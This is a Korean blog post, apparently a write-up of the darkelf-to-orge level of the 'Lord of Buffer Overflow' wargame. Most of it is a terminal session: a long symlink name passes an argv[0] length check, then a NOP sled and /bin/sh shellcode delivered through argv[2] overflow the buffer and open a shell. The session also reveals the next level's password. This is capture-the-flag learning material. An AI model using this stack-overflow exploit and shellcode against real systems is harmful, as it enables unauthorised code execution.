argv[0] 체크가 추가되었다.
하지만 전에 썼던 방범과는 무관한 제한이므로
전 페이로드를 그대로 쓰도록 하겠다. (argv[2] 이용)
[darkelf@localhost tmp]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44 + "\xd2\xf7\xff\xbf" + " " +"\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
argv[2] = 0xbffff7b9
������������������������������������������������
bash$ exit
exit
[darkelf@localhost tmp]$ rm -rf aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[darkelf@localhost tmp]$ ln -s ../
.bash_history .bash_profile .emacs orge tmp
.bash_logout .bashrc .screenrc orge.c
[darkelf@localhost tmp]$ ln -s ../orge `python -c 'print "a"*75'`
[darkelf@localhost tmp]$ ls
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
copy
core
orge
orge.c
[darkelf@localhost tmp]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `python -c 'print "\x90"*44 + "\xd2\xf7\xff\xbf" + " " +"\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
������������������������������������������������
bash$ my-pass
euid = 507
timewalker
bash$
'Wargame > LOB(끝)' 카테고리의 다른 글
| gdb 특정 값찾기 (0) | 2015.02.02 |
|---|---|
| orge -> troll (0) | 2015.02.02 |
| wolfman -> darkelf (0) | 2015.01.29 |
| orc -> wolfman (0) | 2015.01.28 |
| goblin -> orc (0) | 2015.01.28 |